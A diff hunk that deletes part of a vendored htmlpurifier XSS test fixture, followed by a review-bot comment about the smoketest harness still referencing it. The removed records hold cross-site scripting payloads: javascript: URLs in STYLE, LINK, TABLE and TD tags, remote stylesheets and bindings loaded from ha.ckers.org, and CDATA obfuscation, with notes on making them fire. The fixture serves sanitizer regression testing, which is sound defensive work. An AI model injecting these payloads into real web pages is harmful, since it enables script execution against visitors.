- <name>STYLE w/background-image</name>
- <code>&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</code>
-
- <desc>STYLE tag using background-image.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>STYLE w/background</name>
- <code>&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;</code>
-
- <desc>STYLE tag using background.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>Stylesheet</name>
- <code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>Stylesheet</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 1</name>
- <code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;</code>
- <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won&apos;t work unless there is some content on the page other than the vector itself, so you&apos;ll need to add a single letter to the page to make it work if it&apos;s an otherwise blank page.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 2</name>
- <code>&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;</code>
- <desc>Remote style sheet part 2 (this works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 3</name>
- <code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
- <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>Remote Stylesheet 4</name>
- <code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
- <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>TABLE</name>
- <code>&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;</code>
- <desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>TD</name>
- <code>&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;</code>
- <desc>TD background.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>XML namespace</name>
- <code>&lt;HTML xmlns:xss&gt;
-&lt;?import namespace=&quot;xss&quot; implementation=&quot;http://ha.ckers.org/xss.htc&quot;&gt;
-&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
-
-&lt;/HTML&gt;</code>
- <desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>XML data island w/CDATA</name>
- <code>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
-
-&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;</code>
- <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
- <label>HTML Element Attacks</label>
-
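Review bot: the whole hunk deletes the XSS vector fixture that the htmlpurifier smoketests load, yet the diffstat shows this is the only file touched, so nothing here removes or adjusts the harness under 3rdparty/htmlpurifier/smoketests/ that reads xssAttacks.xml; please confirm in the same change that the harness goes too, or that the vendored copy never ran the smoketests, so the tree is not left with a dangling reference. The file is a test fixture (name/code/desc/label/browser records), not the sanitizer's allowlist, so dropping it changes no purification behaviour; the only loss is the regression coverage those vectors gave, and the commit should say why that trade is acceptable for a vendored tree (keeping attack strings out of a deployed 3rdparty directory is a plausible reason, but it is not stated anywhere in this diff). Note also that only the first part of the 1307 deleted lines is visible in this view, so the remainder of the hunk could not be reviewed here.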